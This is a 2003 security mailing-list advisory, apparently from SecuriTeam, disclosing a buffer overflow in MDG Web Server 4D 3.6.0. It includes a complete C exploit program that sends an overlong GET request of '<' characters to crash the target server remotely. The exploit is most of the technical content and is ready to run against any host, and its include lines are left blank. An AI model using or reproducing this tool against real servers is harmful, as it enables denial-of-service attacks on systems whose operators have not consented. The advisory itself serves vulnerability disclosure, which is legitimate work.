[NEWS] MDG Web Server 4D Buffer Overflow (GET)

• Previous message: SecuriTeam: "[NEWS] Cisco Content Service Switch 11000 Series DNS Negative Cache of Information Denial-of-Service Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 5 May 2003 18:27:34 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  MDG Web Server 4D Buffer Overflow (GET)
------------------------------------------------------------------------

SUMMARY

 <http://www.mdg.com/> Web Server 4D is a "full featured web server with
an integrated database for publishing your databases on the web for MacOS
or Windows NT". By sending an overly long GET request, it is possible for
a remote attacker to cause a denial of service against product.

DETAILS

Vulnerable systems:
 * MDG Web Server 4D version 3.6.0

A buffer overflow vulnerability exists within MDG Web Server 4D. By doing
a GET / with 4096 <'s will cause the web server to crash. Once the
malicious payload has been sent, the web server will crash giving a
runtime error. This vulnerability is remotely exploitable. Exploit is
attached for your pleasure.

Vendor response:
Vendor was notified on 04/27/2003. The vendor did not give me a date for
the updated version.

Exploit:
/* Web Server 4D 3.6.0 DoS
*
* Vulnerable systems:
* Web Server 4D 3.6.0 DoS
* Vendor:
* http://www.mdg.com/
*
* Download it here:
* ftp://ftp.mdg.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe
*
* Written and found by badpack3t
* For SP Research Labs
* 04/29/2003
*
* www.security-protocols.com
*
* usage:
* sp-ws4d [targetport] (default is 80)
*
* Greets: c0nnie.
*/

#include
#include

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

"GET /<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
"<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
HTTP/1.1 ";

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target, buffer[30000];
int port,bufsize;
SOCKET mysocket;

if (argc < 2)
{
printf("Web Server 4D 3.6.0 DoS ", argv[0]);
printf("Tool Usage: %s [targetport] (default is 80) ", argv[0]);
printf("www.security-protocols.com ", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];

//for default web attacks
port = 80;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 512;
if (argc >= 4) bufsize = atoi(argv[3]);

mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error! ");
exit(1);
}

printf("Resolving Hostnames... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failed ", argv[1]);
exit(1);
}

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("Connecting... ");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host. ");
exit(1);
}

printf("Connected!... ");
printf("Sending Payload... ");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payload ");
closesocket(mysocket);
exit(1);
}

printf("Remote Webserver has been DoS'ed ");
closesocket(mysocket);
WSACleanup();
return 0;
}

ADDITIONAL INFORMATION

The original advisory can be downloaded from:
 <http://www.security-protocols.com/article.php?sid=1481&mode=&order=0/>
http://www.security-protocols.com/article.php?sid=1481&mode=&order=0/

The information has been provided by tom
<mailto:badpack3t@security-protocols.com> ferris.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NEWS] Cisco Content Service Switch 11000 Series DNS Negative Cache of Information Denial-of-Service Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]